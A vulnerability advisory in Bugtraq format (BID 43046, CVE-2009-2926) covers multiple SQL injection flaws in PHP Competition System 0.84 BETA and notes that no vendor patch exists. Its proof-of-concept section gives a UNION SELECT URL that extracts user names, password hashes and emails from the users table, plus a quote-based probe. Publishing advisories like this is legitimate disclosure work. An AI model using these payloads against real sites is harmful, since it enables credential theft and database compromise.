PHP Competition System Multiple SQL Injection Vulnerabilities
BID:43046
Info
PHP Competition System Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43046 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-2926 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 14 2009 12:00AM |
| Updated: | Aug 14 2009 12:00AM |
| Credit: | Mr.SQL |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PHP Competition System Multiple SQL Injection Vulnerabilities
PHP Competition System is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Competition System 0.84 BETA is vulnerable; other versions may be affected.
PHP Competition System is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Competition System 0.84 BETA is vulnerable; other versions may be affected.
Exploit / POC
PHP Competition System Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/PATH/show_matchs.php?competition=1&season=1&day=-1+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,name,passwd,email),0,0,0,0+from+pcs_users--
http://www.example.com/PATH/persons.php?pageno=0'
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/PATH/show_matchs.php?competition=1&season=1&day=-1+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,name,passwd,email),0,0,0,0+from+pcs_users--
http://www.example.com/PATH/persons.php?pageno=0'
Solution / Fix
PHP Competition System Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP Competition System Multiple SQL Injection Vulnerabilities
References:
References:
- Home page (Cetera eCommerce)
- PHP Competition System - Homepage (PHP Competition System)